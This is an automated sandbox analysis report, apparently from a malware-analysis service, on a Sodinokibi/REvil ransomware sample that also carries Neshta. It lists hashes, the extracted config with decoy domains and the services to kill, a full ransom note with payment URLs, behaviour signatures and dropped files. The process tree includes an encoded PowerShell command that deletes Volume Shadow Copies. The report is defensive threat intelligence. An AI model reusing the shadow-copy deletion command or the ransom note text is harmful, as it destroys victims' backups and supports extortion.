Overview

overview

10

Static

static

10

355e7899e9...18.exe

windows7-x64

10

355e7899e9...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    139s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    11-05-2024 15:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe

  • Size

    204KB

  • MD5

    355e7899e9b1c032865ce0e2b98a257a

  • SHA1

    cb96abf6a6172feb9e95fb08981a44332cd06ea5

  • SHA256

    a207ef339a7b12a825bd9f5fc6349e6c1ec130dbcb48d663d0d1fc91a534aa0d

  • SHA512

    18bb8f91153fcac63881e189f0e40301f49b21018b66b6b560e80fd8b843c27610bf59bfbfb804cea98b07a32f4bc7cf31c562589307ba6f938531addc9e9d21

  • SSDEEP

    3072:sr85C3oFiWjmfb+HP+rnRfUqW1Am5T+8WCdHwJK3Bc:k934jmfCHWtUP1Am5T+LCNwE3G

Score
10/10
neshtasodinokibi1935persistenceransomwarespywarestealer

Malware Config

Extracted

Family

sodinokibi

Botnet

19

Campaign

35

Decoy

latableacrepes-meaux.fr

deziplan.ru

citydogslife.com

karmeliterviertel.com

mundo-pieces-auto.fr

sveneulberg.de

avisioninthedesert.com

pureelements.nl

aidanpublishing.co.uk

gavelmasters.com

biblica.com

baita.ac

innovationgames-brabant.nl

production-stills.co.uk

xn--ziinoapte-6ld.ro

reygroup.pt

apogeeconseils.fr

kristianboennelykke.dk

andrealuchesi.it

efficiencyconsulting.es
Attributes
  • net

    true

  • pid

    19

  • prc

    winword

    encsvc

    steam

    tbirdconfig

    oracle

    sqbcoreservice

    mydesktopservice

    mspub

    ocautoupds

    wordpad

    ocssd

    firefoxconfig

    mysqld

    thebat

    excel

    isqlplussvc

    thunderbird

    mysqld_opt

    outlook

    visio

    onenote

    synctime

    agntsvc

    thebat64

    sqlservr

    dbsnmp

    msftesql

    mysqld_nt

    ocomm

    infopath

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    35

  • svc

    vss

    veeam

    svc$

    memtas

    backup

    sql

    sophos

    mepocs

Extracted

Path

C:\Users\8zpm7q9169-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 8zpm7q9169. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2C13A27D21BA5AEF 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/2C13A27D21BA5AEF Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 8Q+gJbPKQid258inKMP65fQxjSLAfC9hs8Hq7okle3iG/mzboSfRC3nz6r1Y84U1 0f37sXnxy3hAq3MoyV0zTJLB6oNOYRjHBFh3tEiYe7xst9EvlbHPmOUsG6h2ev54 KAUStI8rQXd/QjQde0qTvJ9ebFdPbbPM2DQJ5pgdhTmJT1Imo0mGyND6eSZc897x 6CNlxXbP6qiXAmPyqrVakGVsXAstX4LjUQRhOttYTQHhsxViE8YJuQpDlc190Prw tJnE1/yUAtMWEWswKGcPGMJQtlFhA5amWWxUivSFdlaXI6nh2ATP+PFQ3nvoFwoi ZJGypiTDhG1cpz5WfwqyXpmEmUmR3DcEAwGZbuRh7GQRvw+Bmk86xma1HkeSb7dF YVLMD4BjKYOAwMShDojktKnelif38YkW01wVBOOyJFclhIEIb85Y9igCXm/I8jit 8PMyIkIf28w+ZSJY0uRC4AiS/g1fVW4fRXXLmlYPs/Ar2xlf1nBkwruzQTLguGK6 unAfP6z6z4sKeIFOfDIGDmfA+DSkd/ASOloZePMi/+zTQ1EigMmV6CN8OwqnGGwb 0xdpR9rKpDpnEpFZiXz3Wdz1gRdyXs7Zf9a1qWT3CB30IemYUXt7O2cqogWOimYs +HHAix3egQXeCdrmFSahIbdsA2I1p2oZI9PuvAPB9gcqYrYKgEAidoHiePpU8Sk+ B5sxv4YXYywgz8/Min5oP8DNN8Wa7qtK9hhat53npw2P4EE4wOIN06CUewRlTUJS sw9UXohyhQLBaE/O5LRO1jGrdExHRnsUppJ6/y2ZEHPAzERjrGuCp2/Rjtf+MQgP hn/2kTLyxdgE2touDpt/BYZjQazn4lm9J2I2qFjw2qqvuQG2SdiEA2OBeNkMrA79 dEr1hJyDpzENApZw9QDW8S68/LT+W65ifFsuiQkWZka9HL9n3QudBQevUfrssQLn JkV6z+uYaisykx33Y3R7cRd43u4jP1t7ojBZBm4okDGUnqchbDf4NemhVkdILKk0 BK8TBKzWFlRMTqJ8tlO6Ahm0xCI5bXxqTWhpMmi8E0SRcZLwvzwDmhjM6OjmgfTu QOnNITXcJbfB2fp4UazMcZGHuxa1TCE3OHbmz+TSg7W/JHFOGd3M78MdGwUfKHZb txUmym5p0sN9vpHpBzyGvr3JgM6YKMildljL9u/ccdW+DE52Lw1jEbgCs1R0c4ak /ZV8gRl6Mo9BdlGg1GIicA== Extension name: 8zpm7q9169 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2C13A27D21BA5AEF

http://decryptor.top/2C13A27D21BA5AEF

Signatures

  • Detect Neshta payload 3 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

    persistencespywareneshta
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Sodinokibi/Revil sample 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
    persistence
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system executable filetype association
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1276
    • C:\Users\Admin\AppData\Local\Temp\3582-490\355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe"
      2⤵
      • Executes dropped EXE
      • Enumerates connected drives
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1180
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1788

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe
      Filesize

      547KB

      MD5

      cf6c595d3e5e9667667af096762fd9c4

      SHA1

      9bb44da8d7f6457099cb56e4f7d1026963dce7ce

      SHA256

      593e60cc30ae0789448547195af77f550387f6648d45847ea244dd0dd7abf03d

      SHA512

      ff4f789df9e6a6d0fbe12b3250f951fcf11e857906c65e96a30bb46266e7e1180d6103a03db2f3764e0d1346b2de7afba8259ba080057e4a268e45e8654dfa80

      Download Submit

    • C:\Users\8zpm7q9169-readme.txt
      Filesize

      6KB

      MD5

      88e98094d6810d998278c223804fae60

      SHA1

      a77b73deb393326056ccc08a6fd623120e4ea81b

      SHA256

      4ca03bc50b9462530d9986d635d4a31feb01d4228a37a8bc8d2dec5bd6d2a72b

      SHA512

      1247f0e0a9d6ccc62b4aef9f5187f0faed6dc0847b6ab06129a6f3a25fc9b384957935c259766a2a8a499d1972f347119a310963296361f4c4f2613bbbb65aed

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize

      1KB

      MD5

      a266bb7dcc38a562631361bbf61dd11b

      SHA1

      3b1efd3a66ea28b16697394703a72ca340a05bd5

      SHA256

      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

      SHA512

      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
      Filesize

      242B

      MD5

      654e41a9b1b2ac28471bcecf993e02ba

      SHA1

      c8262775af3b5dba21d3eb21a68ee65b9ff34c06

      SHA256

      91d40104a75addcc5ab4ec7a9e56d59bfa65c03fe8548a495b6f5e3a4f23a866

      SHA512

      d9501bab37f6e599ec4591569031833db66de389988287ee7ed3f0ffb46c1b3779da62a085e61a19edb6c91b9c0c16dac02cce047f9950f448870841796aa2cb

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\TarE832.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      Download Submit

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      194KB

      MD5

      99fce5dd2c89655ebedd333feb252557

      SHA1

      a0ecc0468cec5be5143a00dff062a6030790360f

      SHA256

      67a24ea5864a65b3eea1a5507dfce30f716b67ef56dfd461b0f224e793a70251

      SHA512

      a5090755b223fdad6988bd741acde716fc578cdf722c71b3550b08b652c6d0c476d488d27e720c9c7d6ec95eb1bb9c294d2ab4dfa08421b9774a61343abda202

      Download Submit

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      Filesize

      252KB

      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

      Download Submit

    • \Users\Admin\AppData\Local\Temp\3582-490\355e7899e9b1c032865ce0e2b98a257a_JaffaCakes118.exe
      Filesize

      164KB

      MD5

      1eac0f4ac60cc30b6b448dc102fdf825

      SHA1

      149a8f379faaca8c79b00256584a9c9aa6bf0639

      SHA256

      26df34c6b83ece197977c432fbb033da55d117d3018df939adf5b0927fcec83a

      SHA512

      6f9e3b21cf74670a7fadcffea5aa55401014cb65d93949b42305b1142d67d58d01f35d2d5769730bb07437c5e8d36176df594192d5ea518c3e7519c770ee3aeb

      Download Submit

    • memory/1276-563-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

      Download

    • memory/1276-565-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

      Download

    • memory/2800-91-0x00000000029F0000-0x00000000029F8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2800-90-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

      Download